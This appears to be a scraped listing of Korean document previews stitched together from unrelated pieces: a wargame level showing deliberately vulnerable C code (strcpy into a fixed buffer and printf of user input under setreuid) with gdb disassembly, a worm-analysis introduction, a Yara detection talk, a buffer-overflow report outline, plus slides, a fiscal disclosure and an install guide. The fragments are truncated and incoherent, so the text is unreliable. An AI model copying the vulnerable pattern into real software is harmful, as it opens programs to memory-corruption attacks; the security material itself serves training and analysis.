More information

0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1

0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1 FTZ LEVEL11 #include #include int main( int argc, char *argv[] ) { char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); gdb 를이용해분석해보면 [level11@ftz level11]$

More information

Microsoft PowerPoint - hy2-12.pptx

Microsoft PowerPoint - hy2-12.pptx 2.4 명령어세트 (instruction set) 명령어세트 CPU 가지원하는기계어명령어들의집합 명령어연산의종류 데이터전송 : 레지스터 / 메모리간에데이터이동 산술연산 : 덧셈, 뺄셈, 곱셈및나눗셈 논리연산 : 비트들간의 AND, OR, NOT 및 XOR 연산 입출력 (I/O) : CPU( 레지스터 ) 와외부장치들간의데이터이동 프로그램제어 : 분기, 서브루틴호출

More information

Certlab_ -worm Analysis.hwp

Certlab_ -worm Analysis.hwp Email-Worm Analysis - - 2006. 12. 이강석 / certlab@gmail.com 어셈블리어개발자그룹 :: 어셈러브 http://www.asmlove.co.kr - 1 - E-mail worm 분석과정을담고있는문서이고, 분석에쓰인악성코드는당연히첨부하지않았습니다. 첨부할시악성코드유포를하게되는것이고, 만약첨부하였더라도잘못관리하는경우가대부분이어서대신분석에쓰였던악성코드의

More information

Figure 5.01

Figure 5.01 Chapter 4: Threads Yoon-Joong Kim Hanbat National University, Computer Engineering Department Chapter 4: Multithreaded Programming Overview Multithreading Models Thread Libraries Threading Issues Operating

More information

목 차 1. 공통공시 총괄 1 2. 살림규모 6 2-1 세입결산 3 2-2 세출결산 5 2-3 중기지방재정계획 7 3. 재정여건 8 3 1 재정자립도 8 3 2 재정자주도 9 3-3 재정력지수 10 3-4 통합재정수지 11 4. 채무 및 부채 12 4-1 지방채무 현황

목 차 1. 공통공시 총괄 1 2. 살림규모 6 2-1 세입결산 3 2-2 세출결산 5 2-3 중기지방재정계획 7 3. 재정여건 8 3 1 재정자립도 8 3 2 재정자주도 9 3-3 재정력지수 10 3-4 통합재정수지 11 4. 채무 및 부채 12 4-1 지방채무 현황 2014년도 연천군 지방재정공시 연 천 군 목 차 1. 공통공시 총괄 1 2. 살림규모 6 2-1 세입결산 3 2-2 세출결산 5 2-3 중기지방재정계획 7 3. 재정여건 8 3 1 재정자립도 8 3 2 재정자주도 9 3-3 재정력지수 10 3-4 통합재정수지 11 4. 채무 및 부채 12 4-1 지방채무 현황 12 4 1-1지방채발행 한도액 및 발행액 14

More information

슬라이드 1

슬라이드 1 Detecting Malicious code using Yara in Python Saint Security Dev Team 박건 0 소개 Introduction 박건 (Chris Park) 세인트시큐리티시스템개발팀 namegpark@gmail.com C#, C++, Python malwares.com 서비스개발 PULLer 서비스개발 (EXF) 1 목차 CONTENTS

More information

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드 취약점분석보고서 [Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow] 2012-08-08 RedAlert Team 강동우 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. 취약점요약... 1 1.3. 취약점정보... 1 1.4. 취약점대상시스템목록... 1 2. 분석...

More information

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로

More information

: C, Y, =0, (Crook et al.(2007) ) ( ) 1 2 3 4 5 966 967 967 967 967 4,834 234 383 462 516 508 2,103 (A) 1 661 1,629 2,623 3,802 7,613 3,806 1,040 1,636 2,175 2,788 4,193 2,629 (B) 2,128 2,676 3,492

More information